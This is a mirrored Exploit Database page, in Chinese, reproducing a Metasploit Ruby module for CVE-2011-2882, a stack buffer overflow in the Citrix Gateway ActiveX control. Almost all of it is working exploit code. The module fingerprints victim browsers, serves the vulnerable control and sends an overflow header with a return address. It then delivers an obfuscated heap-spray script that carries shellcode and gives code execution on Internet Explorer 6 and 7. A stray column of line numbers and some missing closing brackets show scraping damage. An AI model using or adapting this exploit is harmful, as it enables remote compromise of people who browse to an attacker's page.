Citrix Gateway – ActiveX Control Stack Buffer Overflow (Metasploit)

Exploit Database
100 阅读

作者： Metasploit

日期： 2011-08-31
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/17762/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

# $Id: citrix_gateway_actx.rb 13670 2011-08-31 00:15:46Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})

super(update_info(info,

'Name' => 'Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability',

'Description'=> %q{

This module exploits a stack based buffer overflow in the Citrix Gateway

ActiveX control. Exploitation of this vulnerability requires user interaction.

The victim must click a button in a dialog to begin a scan. This is typical

interaction that users should be accustom to.

Exploitation results in code execution with the privileges of the user who

browsed to the exploit page.

'License'=> MSF_LICENSE,

'Author' =>

[

'Michal Trojnara', #Initial discovery

'bannedit',

'sinn3r',

'Version'=> '$Revision: 13670 $',

'References' =>

[

[ 'CVE','2011-2882'],

[ 'OSVDB', '74191' ],

[ 'URL', 'https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929' ],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'InitialAutoRunScript' => 'migrate -f',

'Payload'=>

{

'Space'=> 500,

'BadChars' => "\x00\x0a\x0d\x20\x3b\x81\x83\x88\x90",

'Platform' => 'win',

'Targets'=>

[

[ 'Automatic', {} ],

[ 'IE 6 on Windows XP SP3', { 'Ret' => 0x0c0c0c0c } ],

[ 'IE 7 on Windows XP SP3', { 'Ret' => 0x0c0c0b0b } ],

[ 'IE 7 on Windows Vista',{ 'Ret' => 0x0c0c0b0b } ],

'Privileged' => false,

'DisclosureDate' => 'Jul 14 2011', #Coordinated public disclosure according to iDefense

'DefaultTarget'=> 0))

end

def exploit

@ocx = ::File.read(::File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-2882', 'nsepa.ocx'))

super

end

def get_target(request)

t = target

agent = request.headers['User-Agent']

vprint_status("User-Agent: #{agent}")

if t.name =~ /Automatic/

if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/

#Win XP + IE 6

t = targets[1]

elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/

#Win XP + IE 7

t = targets[2]

elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/

#Win Vista + IE7

t = targets[2]

elsif agent == 'nsepa'

#Citrix Access Gateway requesting /epaq

t = agent

else

#Target not supported

t = nil

end

return t, agent

end

def on_request_uri(cli, request)

@mytarget, agent = get_target(request) if @mytarget.nil?

vprint_status("Client requested: #{request.uri}.")

#Target not supported, will not go on

if @mytarget.nil?

print_error("Target not supported: #{agent}")

send_not_found(cli)

return

end

if request.uri.match(/nsepa/)

print_status("Sending nsepa.ocx to #{cli.peerhost}")

send_response(cli, @ocx, { 'Content-Type' => 'application/binary' })

return

end

if request.uri.match(/epaq/)

padding = rand_text_alpha(300)

csec = "eepa_0_"

csec << padding[0, 259]

csec << [@mytarget.ret].pack('V*')

csec << padding[0, 68]

result = rand_text_alpha(1000)

send_response(cli, rand_text_alpha(30), { 'CSEC' => csec, 'RESULT' => result } )

@mytarget = nil

return

end

# Re-generate the payload

return if ((p = regenerate_payload(cli)) == nil)

# payload in JS format

code = Rex::Text.to_unescape(payload.encoded)

#For debugging purposes: nops.substring(0,0x534) lands the payload exactly at 0x0c0c0c0c for IE6

spray = <<-JS

var heap_lib = new heapLib.ie(0x20000);

var code = unescape("#{code}");

var nops = unescape("%u0c0c%u0c0c");

while (nops.length < 0x1000) nops += nops;

var offset = nops.substring(0, 0x550);

var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x20000) shellcode += shellcode;

var block = shellcode.substring(0, (0x10000-6)/2);

heap_lib.gc();

for (var i = 0; i < 0x6000; i++) {

heap_lib.alloc(block);

}

spray = heaplib(spray)

spray = ::Rex::Exploitation::JSObfu.new(spray)

spray.obfuscate

load = %Q|

var d=document.getElementById("nsepadiv");

if(d) {

d.innerHTML=

'<object id="nsepa" classid="CLSID:181BCAB2-C89B-4E4B-9E6B-59FA67A426B5" '+

'width=1px height=1px codebase="#{get_resource}/epa/nsepa.ocx#version=8,0,59,1">' +

'<param name="cookie" value="0123456789abcdef0123456789abcdef">'+

'<param name="location" value="'+document.location+'">'+

'<param name="trace" value="DEBUG">'+

'<param name="vip" value="255.255.255.255">'+

'</object>';

} else {

alert('Internal Error');

}

# the ret slide gets executed via call [esi+45b]

html = <<-EOS

<html>

<body>

#{spray}

#{load}

</script>

</body>

</html>

EOS

html = html.gsub(/^\t\t/, '')

# we need to handle direct /epaq requests

proc = Proc.new do |cli, req|

on_request_uri(cli, req)

end

add_resource({'Path' => "/epaq", 'Proc' => proc}) rescue nil

print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")

send_response(cli, html, { 'Content-Type' => 'text/html' })

end